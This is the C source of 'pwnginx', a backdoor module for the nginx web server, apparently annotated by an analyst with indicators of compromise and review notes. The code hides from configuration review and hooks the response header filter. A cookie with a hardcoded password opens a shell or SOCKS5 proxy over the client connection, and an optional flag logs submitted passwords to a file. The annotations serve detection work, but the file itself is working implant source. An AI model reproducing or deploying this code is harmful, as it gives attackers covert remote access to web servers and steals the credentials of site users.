ngx_http_pwnginx.c
/*
* ngx_http_pwnginx.c - pwnginx main module
* latest version @ https://github.com/t57root/pwnginx
* openwill.me / www.hackshell.net
*/
#include <ngx_config.h>
#include <ngx_core.h>
#include <ngx_http.h>
#include "pwnginx.h"
#include "config.h"
/*
 * Forward declaration of the postconfiguration hook. It is defined at the
 * end of the file but referenced by the context table below.
 */
static ngx_int_t
ngx_http_pwnginx_init(ngx_conf_t *cf);
/*
 * HTTP module context table. Only the postconfiguration slot is filled in;
 * every configuration create/merge callback is NULL, so this module keeps no
 * main/server/location configuration of its own.
 */
static ngx_http_module_t ngx_http_pwnginx_ctx = {
NULL, /* preconfiguration */
ngx_http_pwnginx_init, /* postconfiguration */
NULL, /* create main configuration */
NULL, /* init main configuration */
NULL, /* create server configuration */
NULL, /* merge server configuration */
NULL, /* create location configuration */
NULL /* merge location configuration */
};
/*
 * Module definition exported to nginx.
 *
 * Analyst note: the directives slot is NULL and no process/thread lifecycle
 * hooks are set, so nothing in this table requires a line in nginx.conf.
 * Reviewing the configuration alone will therefore not reveal this module;
 * it has to be found by inspecting the nginx binary or build itself (e.g.
 * the module list reported by `nginx -V`, or the "pwnginx" strings that the
 * header filter in this file embeds).
 */
ngx_module_t ngx_http_pwnginx = {
NGX_MODULE_V1,
&ngx_http_pwnginx_ctx, /* module context */
NULL, /* module directives */
NGX_HTTP_MODULE, /* module type */
NULL, /* init master */
NULL, /* init module */
NULL, /* init process */
NULL, /* init thread */
NULL, /* exit thread */
NULL, /* exit process */
NULL, /* exit master */
NGX_MODULE_V1_PADDING
};
/*
 * Previous heads of the output header/body filter chains. They are saved by
 * ngx_http_pwnginx_init and called at the end of this module's filters so
 * that normal response processing continues.
 */
static ngx_http_output_header_filter_pt ngx_http_next_header_filter;
static ngx_http_output_body_filter_pt ngx_http_next_body_filter;
/*
 * Output header filter that ngx_http_pwnginx_init places at the head of the
 * header filter chain. This is the implant's trigger and data-capture point.
 *
 * It does two things before handing the request to the next header filter:
 *
 *  1. Cookie trigger: when the request carries exactly one Cookie header
 *     whose value starts with "pwnginx=" PASSWORD "; action=1" (or
 *     "action=2"), it writes a marker to the raw client socket and passes
 *     that socket to exec_shell() or exec_socks5(). Both helpers and
 *     msend() are defined outside this file (presumably via pwnginx.h);
 *     judging by their names they hand out a shell / SOCKS5 relay over the
 *     connection - confirm against their definitions.
 *
 *  2. Credential capture (only when PWD_SNIFF_FILE is defined at build
 *     time): when the first request-body buffer contains a password-like
 *     field name, the request line, Host header and body buffer are
 *     appended to the file named by PWD_SNIFF_FILE.
 *
 * Indicators a defender can derive from this function alone:
 *  - a Cookie header value beginning with "pwnginx=" followed by
 *    "; action=1" or "; action=2";
 *  - the bytes "pwnginx1" or "pwnginx2" plus a trailing NUL (sizeof counts
 *    the terminator) written to the client socket outside any HTTP response;
 *  - an nginx worker appending to the PWD_SNIFF_FILE path (its value is not
 *    defined on this page), with records ending in a "======" separator line;
 *  - the literal strings above inside the nginx binary.
 *
 * @param r  the request whose response headers are being emitted
 * @return   whatever the next header filter in the chain returns
 */
static ngx_int_t
ngx_http_pwnginx_header_filter(ngx_http_request_t *r)
{
/* Raw socket descriptor of the client connection; handed to the helpers below. */
int cmd_fd = r->connection->fd;
ngx_table_elt_t ** cookies = NULL;
cookies = r->headers_in.cookies.elts;
/* Only requests with exactly one Cookie header are examined. */
if(r->headers_in.cookies.nelts==1){
/*
 * Prefix comparison: 8 bytes of "pwnginx=" + strlen(PASSWORD) + 10 bytes of
 * "; action=N" gives the strlen(PASSWORD)+18 length. PASSWORD is a
 * string-literal macro defined outside this file (presumably config.h).
 */
if(strncmp((char *)cookies[0]->value.data,"pwnginx="PASSWORD"; action=1",strlen(PASSWORD)+18)==0){
msend(cmd_fd, "pwnginx1", sizeof("pwnginx1"));
exec_shell(cmd_fd);
}
else if(strncmp((char *)cookies[0]->value.data,"pwnginx="PASSWORD"; action=2",strlen(PASSWORD)+18)==0){
msend(cmd_fd, "pwnginx2", sizeof("pwnginx2"));
exec_socks5(cmd_fd);
}
}
#ifdef PWD_SNIFF_FILE
if (r->request_body){
/* Only the first buffer of the request-body chain is inspected. */
ngx_chain_t *cl = r->request_body->bufs;
if(cl){
/*
 * Work on a copy of at most 1024 bytes of the body, forced to be
 * NUL-terminated so the substring searches below have a bound.
 * NOTE(review): the malloc result is not checked and tmp_buf is never
 * freed in this function; strncpy also relies on a NUL in the source
 * buffer to stop before 1024 bytes. Unexplained worker crashes or steady
 * memory growth in nginx workers are plausible symptoms of this module.
 */
char *tmp_buf = malloc(1025);
tmp_buf[1024]='\0';
strncpy(tmp_buf,(char *)cl->buf->pos,1024);
/*
 * Case-insensitive search for URL-encoded and multipart password field
 * names. ngx_strcasestrn takes the needle length minus one, hence the
 * "N-1" arguments.
 */
if( ngx_strcasestrn((u_char *)tmp_buf, "password=",9-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "passwd=",7-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "pwd=",4-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "name=\"password\"",15-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "name=\"passwd\"",13-1) ||
ngx_strcasestrn((u_char *)tmp_buf, "name=\"pwd\"",10-1)){
/*
 * Append one record per matching request: request line, Host header, the
 * body buffer, then a separator line.
 * NOTE(review): fopen and headers_in.host are used without NULL checks,
 * the request line and Host value are modified in place by writing a NUL
 * at data[len], and the final %s prints cl->buf->pos rather than the
 * bounded copy.
 */
FILE *fp = fopen(PWD_SNIFF_FILE,"a");
r->request_line.data[(int)r->request_line.len]='\0';
fprintf(fp,"%s\n",(char *)r->request_line.data);
r->headers_in.host->value.data[(int)r->headers_in.host->value.len]='\0';
fprintf(fp,"Host:%s\n",(char *)r->headers_in.host->value.data);
fprintf(fp,"%s\n======================\n",cl->buf->pos);
fclose(fp);
}
}
}
#endif
/* Continue normal response processing with the previously installed filter. */
return ngx_http_next_header_filter(r);
}
/*
 * Output body filter. It is a pure pass-through: the chain `in` is neither
 * inspected nor modified, and the call is forwarded to the filter that was
 * at the head of the body chain before this module was installed.
 *
 * @param r   the request being served
 * @param in  the response body chain
 * @return    whatever the next body filter returns
 */
static ngx_int_t
ngx_http_pwnginx_body_filter(ngx_http_request_t *r, ngx_chain_t *in)
{
return ngx_http_next_body_filter(r, in);
}
/*
 * Postconfiguration hook (registered in ngx_http_pwnginx_ctx). It saves the
 * current heads of the output header and body filter chains and installs
 * this module's filters in their place, so the module's header filter is
 * the one nginx calls first from then on.
 *
 * Analyst note: this is the only place where the module hooks into nginx.
 * The hook is established at configuration time without any directive.
 *
 * @param cf  configuration context; not used here
 * @return    always NGX_OK
 */
static ngx_int_t
ngx_http_pwnginx_init(ngx_conf_t *cf)
{
ngx_http_next_header_filter = ngx_http_top_header_filter;
ngx_http_top_header_filter = ngx_http_pwnginx_header_filter;
ngx_http_next_body_filter = ngx_http_top_body_filter;
ngx_http_top_body_filter = ngx_http_pwnginx_body_filter;
/* The ROOTSHELL conditional is empty in this listing; defining it changes nothing here. */
#ifdef ROOTSHELL
#endif
return NGX_OK;
}